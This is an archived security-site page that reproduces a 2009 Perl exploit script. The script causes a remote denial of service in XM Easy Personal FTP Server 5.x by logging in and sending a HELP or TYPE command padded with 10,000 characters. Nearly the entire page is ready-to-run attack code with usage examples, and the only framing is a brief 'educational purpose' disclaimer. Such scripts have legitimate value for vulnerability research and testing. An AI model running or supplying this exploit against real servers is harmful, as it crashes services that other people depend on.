AOH :: HP Unsorted X :: BT-21133.HTM

XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit



XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit
XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit



#!usr/bin/perl -w=0D
=0D
#######################################################################################=0D
#   XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service=0D
#   via a "HELP" or "TYPE" command with an overly long argument.=0D
#   Refer:=0D
# 												http://secunia.com/advisories/35271/=0D 
# Original advisory avaiable at:	http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/=0D 
#		 Product link:	http://www.dxm2008.com/=0D 
#=0D
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$=0D
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$=0D
#=0D
#        Author:    Vinod Sharma=0D
#        Email:     vinodsharma[underscore]mimit[at]gmail.com=0D
# Blog: http://securitygyan.com/=0D 
#        Date:      09th june, 2009=0D
#        =0D
#=0D
###Thanks all the Security Folks###=0D
########################################################################################=0D
=0D
use IO::Socket;=0D
=0D
my $server_ip=$ARGV[0];=0D
my $server_port=$ARGV[1];=0D
my $username=$ARGV[2];=0D
my $password=$ARGV[3];=0D
my $command=$ARGV[4];=0D
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";          =0D
=0D
if(($#ARGV + 1)!=5)=0D
{=0D
				print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";=0D
				print "\nargument command can have a value HELP or TYPE\n";=0D
				print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP";=0D
				=0D
				exit;=0D
}=0D
				=0D
=0D
$socket = new IO::Socket::INET (PeerAddr  =>$server_ip,  PeerPort  => $server_port, Proto => 'tcp', )   or die "Couldn't connect to Server\n";=0D
=0D
                              =0D
while (1)=0D
{=0D
	=0D
    $socket->recv($recv_data,1024);=0D
    print "RECIEVED: $recv_data"; =0D
    =0D
	$send_data1 ="USER ".$username."\r\n";=0D
    $socket->send($send_data1);=0D
    $socket->recv($recv_data1,1024);=0D
    print "RECIEVED: $recv_data1"; =0D
	   =0D
	   $send_data2 ="PASS ".$password."\r\n";=0D
       $socket->send($send_data2);=0D
	   $socket->recv($recv_data2,1024);=0D
        print "RECIEVED: $recv_data2"; =0D
		=0D
		=0D
       $socket->send($buffer);=0D
	   print "\nAttack is send.....................\n";=0D
	   $socket->recv($recv_data3,1024);=0D
        print "RECIEVED: $recv_data3"; =0D
        =0D
		close $socket;=0D
         =0D
  }    =0D
    

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.